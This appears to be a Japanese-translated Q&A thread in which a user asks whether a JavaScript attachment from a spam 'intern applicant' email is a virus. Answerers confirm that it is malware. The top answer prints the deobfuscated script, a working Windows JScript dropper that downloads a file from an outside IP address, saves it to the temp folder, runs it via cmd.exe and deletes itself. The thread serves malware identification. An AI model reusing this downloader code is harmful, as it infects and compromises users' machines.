web-dev-qa-db-ja.com

これはJavascriptウイルスですか?

だから私はこれを言っているランダムなメールを受け取りました。非常に自動化されたように見えます:

「調子はどうですか。私は2016年4月9日にあなたのウェブサイトにアクセスしていましたが、とても興味があります。現在、フルタイムまたはフィールドでの経験を得るためのインターンとして仕事を探しています。履歴書を確認して、私はあなたの考えを知っています。

次に、JavaScriptファイルを添付します。 I VirusTotalでスキャンしました 1/55しか見つかりません。ファイルを開いてテキストを確認し、それを this dump file にコピーして貼り付けました。これは非常に長いためです。

JavaScriptに詳しい人なら誰でも、それがウイルスであるかどうかを確認できますか?

malwarejavascriptvirus
7
2000mroliver

間違いなくマルウェアです。 ActiveXを使用して、cmd.exeでシェルを開きます。これは難読化されたバージョンです。

function zQlMdib() {
    var asupcI = new ActiveXObject("MSXML2.XMLHTTP");
    asupcI['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    var OnvPPuGD = WScript['ScriptFullName'];
    asupcI['send']();
    if (asupcI['Status'] == 200) {
        var Bz = new ActiveXObject("Scripting.FileSystemObject");
        var mEadcyX = new ActiveXObject("ADODB.Stream");
        var zpfPsOb = Bz['GetSpecialFolder'](2) + '\' + Bz['GetTempName']();
        mEadcyX['Open']();
        mEadcyX['Type'] = 1;
        var oMod = new ActiveXObject("WScript.Shell");
        mEadcyX['Write'](asupcI['ResponseBody']);
        mEadcyX['Position'] = 0;
        mEadcyX['SaveToFile'](zpfPsOb);
        mEadcyX['Close']();
        oMod['run']('cmd.exe /c ' + zpfPsOb, 0);
    }
    Bz['deleteFile'](OnvPPuGD);
}

Malwrのペイロードの分析は次のとおりです。

https://malwr.com/analysis/MGI0ZGIwNjNjMjlhNGM0YWE1ZTA5ZDgyYmNiZjRmMjE/

8
forest

はい、それは悪意のあるコードのように見えます。このタイプのコードは、ブラウザーのコンテキストでは許可されていません。さらに、コードは多かれ少なかれMicrosoft Internet ExplorerおよびMicrosoft Windowsオペレーティングシステムと互換性があります。他のブラウザはMicrosoftのActiveXテクノロジーをサポートしていないためです。

1
Mangu Singh Rajpurohit